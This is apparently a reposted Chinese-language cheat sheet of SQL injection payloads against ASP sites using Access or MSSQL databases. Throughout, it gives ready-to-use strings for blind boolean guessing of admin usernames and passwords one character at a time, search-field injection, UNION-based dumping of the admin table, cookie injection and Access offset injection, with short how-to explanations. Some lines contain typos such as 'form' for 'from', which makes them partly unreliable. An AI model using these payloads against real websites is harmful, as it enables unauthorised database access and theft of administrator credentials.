標籤:
注意:對於普通的get注入,如果是字元型,前加‘ 後加 and ‘‘=‘
拆半法
######################################
and exists (select * from MSysAccessObjects) 這個是判斷是不是ACC資料庫,MSysAccessObjects是ACCESS的預設表。
and exists (select * from admin)
and exists(select id from admin)
and exists(select id from admin where id=1)
and exists(select id from admin where id>1)
然後再測試下id>1 正常則說明不止一個ID 然後再id<50 確定範圍
and exists (select username from admin)
and exists (select password from admin)
and exists (select id from admin where len(username)<10 and id=1)
and exists (select id from admin where len(username)>5 and id=1)
and exists (select id from admin where len(username)=6 and id=1)
and exists (select id from admin where len(password)<10 and id=1)
and exists (select id from admin where len(password)>5 and id=1)
and exists (select id from admin where len(password)=7 and id=1)
and (select top 1 asc(mid(username,1,1)) from admin)=97
返回了正常,說明第一username裡的第一位內容是ASC碼的97,也就是a。
猜第二位把username,1,1改成username,2,1就可以了。
猜密碼把username改成password就OK了
##################################################
搜尋型注入
##################################
%‘ and 1=1 and ‘%‘=‘
%‘ and exists (select * from admin) and ‘%‘=‘
%‘ and exists(select id from admin where id=1) and ‘%‘=‘
%‘ and exists (select id from admin where len(username)<10 and id=1) and ‘%‘=‘
%‘ and exists (select id from admin where len(password)=7 and id=1) and ‘%‘=‘
%‘ and (select top 1 asc(mid(username,1,1)) from admin)=97 and ‘%‘=‘
這裡也說明一下,搜尋型注入也無他,前加%‘ 後加 and ‘%‘=‘
對於MSSQL資料庫,後面可以吧 and ‘%‘=‘換成--
還有一點搜尋型注入也可以使用union語句。
########################################################
聯集查詢。
#####################################
order by 10
and 1=2 union select 1,2,3,4,5,6,7,8,9,10
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 form admin where id=1
很簡單。有一點要說明一下,where id=1 這個是爆ID=1的管理員的時候,where id=1就是爆ID=2的管理用的,一般不加where id=1這個限制語句,應該是爆的最前面的管理員吧!(注意,管理的id是多少可不一定哈,說不定是100呢!)
###################################
cookie注入
###############################
http://www.******.com/shownews.asp?id=127
http://www.******.com/shownews.asp
alert(="id="+escape("127"));
alert(="id="+escape("127 and 1=1"));
alert(="id="+escape("127 order by 10"));
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
alert(="id="+escape("127 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin where id=1"));
這些東西應該都不用解釋了吧,給出語句就行了吧。這裡還是用個聯集查詢,你把它換成拆半也一樣,不過不太適合正常人使用,因為曾經有人這樣累死過。
###################################
位移注入
###########################################################
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,* from admin
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on
a.id=d.id)
and 1=2 union select 1,* from (admin as a inner join admin as b on a.id=b.id)
and 1=2 union select 1,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
轉載自:http://tiwson.iteye.com/blog/1919349
注入語句詳解(get注入,cookie注入,搜尋型注入等)